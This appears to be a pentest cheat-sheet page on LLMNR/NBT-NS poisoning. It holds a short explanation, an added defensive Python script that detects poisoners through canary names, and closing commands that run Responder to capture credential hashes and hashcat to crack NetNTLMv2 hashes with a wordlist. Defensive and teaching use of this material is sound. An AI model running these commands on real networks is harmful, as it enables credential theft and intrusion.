killchain-compendium/Exploits/Windows/LLMNR.md

Link-Local Multicast Name Resolution (LLMNR), NetBIOS Name Service (NBT-NS)

  • LLMNR: name resolution for other hosts inside the local domain

  • NBT-NS: identifies hosts on the network by their NetBIOS names

  • Responder impersonates the actual service to obtain credentials
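
An added example, not part of the original page: any host on the link can answer an LLMNR query, so a defender can query canary names that no host owns and flag every source that answers them. The canary names, IP addresses and function names below are constructed for illustration.

```python
import socket
import struct

def build_llmnr(txid, name, answer_ip=None):
    """Build a constructed LLMNR query, or an A-record response if answer_ip is set."""
    qname = bytes([len(name)]) + name.encode("ascii") + b"\x00"  # single-label name
    msg = struct.pack("!6H", txid, 0x8000 if answer_ip else 0, 1, int(bool(answer_ip)), 0, 0)
    msg += qname + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN
    if answer_ip:
        msg += qname + struct.pack("!HHIH", 1, 1, 30, 4) + socket.inet_aton(answer_ip)
    return msg

def parse_llmnr(data):
    """Return (is_response, answer_count, queried_name) for a DNS-format LLMNR message."""
    if len(data) < 12:
        raise ValueError("truncated header")
    _id, flags, qdcount, ancount, _ns, _ar = struct.unpack("!6H", data[:12])
    labels, pos = [], 12
    while qdcount:
        length = data[pos] if pos < len(data) else -1  # -1 marks a truncated name
        if length == 0:
            break
        label = data[pos + 1:pos + 1 + length]
        if not 0 < length <= 63 or len(label) != length:
            raise ValueError("truncated or invalid question name")
        labels.append(label.decode("ascii", "replace"))
        pos += 1 + length
    return bool(flags & 0x8000), ancount, ".".join(labels).lower()

def find_poisoners(packets, canaries):
    """Map source IP -> canary names it answered; no legitimate host owns a canary."""
    hits = {}
    for src, payload in packets:
        try:
            is_response, ancount, name = parse_llmnr(payload)
        except ValueError:
            continue  # skip malformed traffic instead of aborting the scan
        if is_response and ancount > 0 and name in canaries:
            hits.setdefault(src, set()).add(name)
    return hits

# Constructed sample capture: (source IP, UDP/5355 payload)
CANARIES = {"zq-fileshare-7f3a", "hr-print-c41d"}
SAMPLE = [
    ("10.0.0.15", build_llmnr(1, "zq-fileshare-7f3a")),               # canary query
    ("10.0.0.66", build_llmnr(1, "zq-fileshare-7f3a", "10.0.0.66")),  # answers a canary
    ("10.0.0.66", build_llmnr(2, "hr-print-c41d", "10.0.0.66")),      # answers another
    ("10.0.0.20", build_llmnr(3, "fileserver01", "10.0.0.20")),       # real host, own name
    ("10.0.0.99", b"\x00\x01\x80"),                                   # malformed, ignored
]
```

`find_poisoners(SAMPLE, CANARIES)` reports only 10.0.0.66; the host answering for its own name and the machine that merely sent the query are not flagged.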

Usage

sudo responder -I <NIC> -rdw -v 
  • Dictionary attack on the captured password hash
hashcat -m 5600 hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -r rules/OneRuleToRuleThemAll.rule --debug-mode=1 --debug-file=matched.rule